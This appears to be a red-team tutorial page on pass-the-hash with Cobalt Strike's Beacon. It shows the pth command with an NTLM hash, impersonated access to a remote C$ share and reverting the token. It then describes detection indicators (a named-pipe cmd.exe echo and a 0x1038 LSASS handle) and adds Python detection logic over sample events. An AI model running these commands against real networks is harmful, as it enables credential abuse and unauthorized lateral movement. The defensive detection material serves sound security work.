Pass The Hash (PTH)

Pass The Hash

Note: Requires elevated privileges on the host, since mimikatz must open a handle to LSASS (see OPSEC below).

Cobalt Strike

Beacon has a built-in pth command that runs mimikatz in the background.

First, attempt to access a resource the current token is not permitted to reach, so the effect of the impersonation is visible afterwards:

beacon> getuid
[*] You are DEV\sam (admin)

beacon> ls \\internal-website.rotta.dev\c$
[-] could not open \\internal-website.rotta.dev\c$\*: 5 - ERROR_ACCESS_DENIED

Execute PTH with NTLM hash

We can execute Pass-The-Hash like so:

beacon> pth DEV\robert 2B576ACBE6BCFDA7294D6BD18041B8FE
...

List resources as impersonated user

beacon> ls \\internal-website.rotta.dev\c$
[*] Listing: \\internal-website.rotta.dev\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/15/2024 11:30:11   $Recycle.Bin
          dir     08/10/2024 11:45:28   $WinREAgent

Drop Impersonation

Use rev2self to drop impersonation.

beacon> rev2self
[*] Tasked beacon to revert token

OPSEC

When the pth command runs, Beacon spawns a cmd.exe that echoes a token into a named pipe; the process creation event looks like:

program	: C:\Windows\system32\cmd.exe /c echo 71fb38e2d65 > \\.\pipe\675b08

Note: This can be found via the "Suspicious Named Pipe Impersonation" search, which queries process events where the arguments contain "echo", ">" and "\.\pipe".

Note: Mimikatz also opens a handle to LSASS with an access mask that is suspicious for most processes: PROCESS_QUERY_LIMITED_INFORMATION (0x1000), PROCESS_VM_WRITE (0x0020), PROCESS_VM_READ (0x0010) and PROCESS_VM_OPERATION (0x0008), i.e. a combined mask of 0x1038. The write rights are the telling part; QUERY_LIMITED_INFORMATION on its own is routine.
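As an added detection example (not part of the original notes, and not Cobalt Strike's or mimikatz's code), the following Python runs both OPSEC checks described above over constructed sample events: the substring search for the named-pipe command line ("echo", ">" and "\.\pipe" in the arguments), and a decode of the LSASS handle access mask that flags handles carrying memory-write rights. Event field names, image paths and pids are assumptions made for the example; flagging only PROCESS_VM_WRITE or PROCESS_VM_OPERATION against lsass.exe, rather than any handle at all, is a design choice of the example, since PROCESS_QUERY_LIMITED_INFORMATION alone is common benign activity.

```python
# Added example, not from the original notes: detection logic for the two OPSEC
# indicators (the cmd.exe "echo > \\.\pipe\" pattern and the LSASS handle rights),
# run over constructed sample events. Event shapes, paths and pids are assumptions.

# Constructed process-creation events (not real telemetry).
PROCESS_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c echo 71fb38e2d65 > \\.\pipe\675b08"},
    {"pid": 5208, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c echo done > C:\Temp\build.log"},
    {"pid": 6100, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c type \\.\pipe\logsvc"},
]

# Constructed process-access events in the shape of Sysmon Event ID 10.
ACCESS_EVENTS = [
    {"source_pid": 4096, "source_image": r"C:\Users\sam\AppData\Local\Temp\update.exe",
     "target_image": r"C:\Windows\system32\lsass.exe", "granted_access": 0x1038},
    {"source_pid": 812, "source_image": r"C:\Windows\system32\svchost.exe",
     "target_image": r"C:\Windows\system32\lsass.exe", "granted_access": 0x1000},
    {"source_pid": 4096, "source_image": r"C:\Users\sam\AppData\Local\Temp\update.exe",
     "target_image": r"C:\Windows\system32\notepad.exe", "granted_access": 0x1038},
]

# Process access rights named in the notes (values from the Windows SDK).
PROCESS_ACCESS_RIGHTS = {
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
# The four rights OR'd together: the mask the notes attribute to mimikatz.
MIMIKATZ_PTH_MASK = 0x0008 | 0x0010 | 0x0020 | 0x1000  # == 0x1038

# Rights that let a process modify another process's memory. Opening LSASS with
# either of these is what the notes describe; QUERY_LIMITED_INFORMATION alone is
# routine (many benign tools open LSASS with 0x1000) and is not flagged here.
LSASS_WRITE_RIGHTS = 0x0008 | 0x0020


def is_pipe_impersonation(cmdline: str) -> bool:
    """The 'Suspicious Named Pipe Impersonation' search from the notes:
    the command line contains "echo", ">" and "\\.\\pipe" (case-insensitive)."""
    lowered = cmdline.lower()
    return all(token in lowered for token in ("echo", ">", r"\.\pipe"))


def find_pipe_impersonation(events) -> list:
    """Return the pids of process events whose command line matches."""
    return [e["pid"] for e in events if is_pipe_impersonation(e["cmdline"])]


def decode_access(mask: int) -> list:
    """Name the known rights set in a granted-access mask, lowest bit first."""
    return [name for bit, name in sorted(PROCESS_ACCESS_RIGHTS.items()) if mask & bit]


def is_suspicious_lsass_access(event) -> bool:
    """Flag handles to lsass.exe that carry memory-write rights."""
    target = event["target_image"].lower()
    return target.endswith(r"\lsass.exe") and bool(event["granted_access"] & LSASS_WRITE_RIGHTS)


def find_suspicious_lsass_access(events) -> list:
    """Return (source_pid, decoded rights) for each flagged LSASS handle."""
    return [(e["source_pid"], decode_access(e["granted_access"]))
            for e in events if is_suspicious_lsass_access(e)]


if __name__ == "__main__":
    print("pipe impersonation pids:", find_pipe_impersonation(PROCESS_EVENTS))
    for pid, rights in find_suspicious_lsass_access(ACCESS_EVENTS):
        print(f"pid {pid} opened lsass.exe with {', '.join(rights)}")
```

Run against the constructed events, only pid 4120 matches the named-pipe search (the `type \\.\pipe\logsvc` line has the pipe path but no `echo`/`>`), and only the 0x1038 handle to lsass.exe is flagged; the svchost.exe handle with 0x1000 alone is decoded but ignored, which is what keeps this rule quiet on a normal host.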
